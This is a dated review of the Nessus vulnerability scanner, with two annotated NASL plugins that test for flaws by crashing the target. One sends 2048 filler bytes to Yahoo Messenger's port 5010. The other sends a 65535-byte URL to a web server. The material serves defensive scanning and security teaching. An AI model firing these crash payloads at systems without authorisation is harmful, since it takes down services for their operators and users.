Nessus

Summary

Nessus is a network security scanner based on a proprietary scripting language, NASL, designed to simplify vulnerability detection.

Nessus is a fully featured, easily extendable, frequently updated security scanner. Its vulnerability detection is done entirely by external NASL scripts and small C programs. This plugin architecture is probably its biggest advantage over other security scanners: when a new vulnerability is found, a NASL script to detect (or, for denial-of-service style tests, actually trigger) it can be written and added to Nessus' vulnerability database. The Nessus website also maintains a database of scripts that is updated daily, and the Nessus package includes a program that automatically updates the local script database from the central one — a very useful feature.

URL: http://www.nessus.org

Notes

Pros: plugin architecture — every test is an external NASL script or small C program, so administrators can add their own checks; the central script database is updated daily and the bundled updater keeps the local copy in sync.

Cons: NASL is a proprietary language that must be learned before writing custom tests; plugins in the ACT_DENIAL category (both samples below are in it) detect a vulnerability by actually crashing the target service, so a successful run causes real downtime — only run them with authorisation and a maintenance window, and treat their results as heuristics (a service that merely stops accepting connections for a few seconds is reported as vulnerable).

Rating: Highly recommended, especially for administrators who can keep it up-to-date and code their own tests.

Classification

Sample NASL scripts (commentary is between "(*" and "*)" marks)




#

# This script was written by Noam Rathaus 

#

# See the Nessus Scripts License for details

#

#



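(* Port the vulnerable listener lives on.  Defined once here so that the
registration block and the test below cannot drift apart. *)
port = 5010;

(* Everything inside this block is for the Nessus user's benefit: it
registers the script with the scanner and describes the vulnerability being
tested for.  When "description" is set the script exits at the end of the
block, so the actual test further down never runs in that mode. *)
if (description)
{
 (* Numeric ID of this script in the central Nessus script database. *)
 script_id(10326);

 (* CVE candidate number under which this issue is classified. *)
 script_cve_id("CAN-2000-0047");

 (* Human-readable name, report text and one-line summary shown to the user. *)
 script_name(english:"Yahoo Messenger Denial of Service attack");

 report = "It is possible to cause Yahoo Messenger to crash by sending a few bytes
of garbage into its listening port TCP 5010.

Solution: Block those ports from outside communication

Risk factor : Low";
 script_description(english:report);

 script_summary(english:"Yahoo Messenger Denial of Service attack");

 (* ACT_DENIAL: this test works by actually crashing the service.  If it
 succeeds, Yahoo Messenger on the target stays down until restarted. *)
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
 script_family(english:"Denial of Service", francais:"Déni de service");

 (* Only worth running when the listener port is reachable. *)
 script_require_ports(port);

 exit(0);
}

(* The test itself starts here. *)

(* Nothing to do unless the scanner already knows the port is open. *)
if (!get_port_state(port)) exit(0);

s = open_sock_tcp(port);
if (!s) exit(0);

(* Send 2048 filler bytes - crap() emits a fixed repeated character ("X"
by default), not random data - and drop the connection. *)
send(socket:s, data:crap(2048));
close(s);

(* Give the service time to fall over. *)
sleep(5);

(* Reconnect.  A successful connect means the listener survived, which is
only worth a warning that Yahoo Messenger is exposed; a failed connect is
taken as the crash, i.e. the vulnerability is present.  This is a
heuristic: the listener could have stopped accepting for reasons unrelated
to this test, and a service that restarts itself within the 5-second
window would be reported as not vulnerable. *)
probe = open_sock_tcp(port);
if (probe)
{
 security_warning(port:port, data:"Yahoo Listening port is open.");
 (* The original never closed this second socket; release it explicitly. *)
 close(probe);
}
else
{
 security_hole(port:port);
}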



(************ end of the Yahoo script *************)











#

# This script was written by Renaud Deraison 

#

# See the Nessus Scripts License for details

#





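(* Registration block: when "description" is set the script only records
its metadata and exits, so the test further down does not run. *)
if (description)
{
 (* Numeric ID of this script in the central Nessus script database. *)
 script_id(10320);

 (* Multilingual name and report text.  Note that the text promises more
 than the test below can show: the script only observes whether the server
 keeps answering after an oversized request, so a positive result means
 "the server stopped responding", not "arbitrary code execution was
 demonstrated". *)
 script_name(english:"Too long URL", francais:"URL trop longue");

 desc_en = "
It may be possible to make a web server execute
arbitrary code by sending it a too long url. 

Risk factor : High

Solution : Upgrade your web server.";

 desc_fr = "
 
Il est peut etre possible de faire executer du code arbitraire
à un serveur web en lui envoyant une URL trop longue.

Facteur de risque : Elevé

Solution : Mettez à jour votre serveur web.";

 script_description(english:desc_en, francais:desc_fr);

 script_summary(english:"Web server buffer overflow",
                francais:"Dépassement de buffer dans un serveur web");

 (* ACT_DENIAL: the test works by trying to crash the server, so a
 successful run leaves the target's web service down.  The family below
 ("Gain root remotely") reflects what the description claims, not what
 the script verifies. *)
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 script_family(english:"Gain root remotely", francais:"Passer root à distance");

 (* Run only after find_service.nes has mapped the services, and only when
 it found a web server or port 80 is open; otherwise the test would waste
 time on hosts without a web server. *)
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);

 exit(0);
}

(* The test code starts here. *)

(* Web server port as recorded by find_service.nes, falling back to the
default port 80 when nothing was recorded. *)
port = get_kb_item("Services/www");
if (!port) port = 80;

(* If we cannot even connect there is nothing to test. *)
soc = open_sock_tcp(port);
if (!soc) exit(0);

(* Send a request whose path is 65535 filler bytes (crap() emits a repeated
character, "X" by default) and drop the connection. *)
req = string("GET /", crap(65535), "\r\n");
send(socket:soc, data:req);
close(soc);

(* Give the server a moment to fall over.  One second is short: a server
that is merely slow to accept, or one restarted by a supervisor within that
second, can skew the result either way. *)
sleep(1);

(* If nothing accepts connections any more, treat the server as crashed:
report it and record the fact for other scripts. *)
soc2 = open_sock_tcp(port);
if (!soc2)
{
	security_hole(port:port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
	exit(0);
}

(* The port still accepts connections; check whether the server can still
answer a well-formed request. *)
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc2, data:req);
r = recv(socket:soc2, length:1024);
(* Fix: the original called close(soc) here, which had already been closed
above, and leaked soc2. *)
close(soc2);

(* No answer to a valid request is also taken as a crash.  This too is a
heuristic: the server may simply not have answered before recv() gave up. *)
if (!r)
{
	security_hole(port:port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
}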





(************ end of the script *************)





Evaluated by Patrick LeBlanc on 7-17-00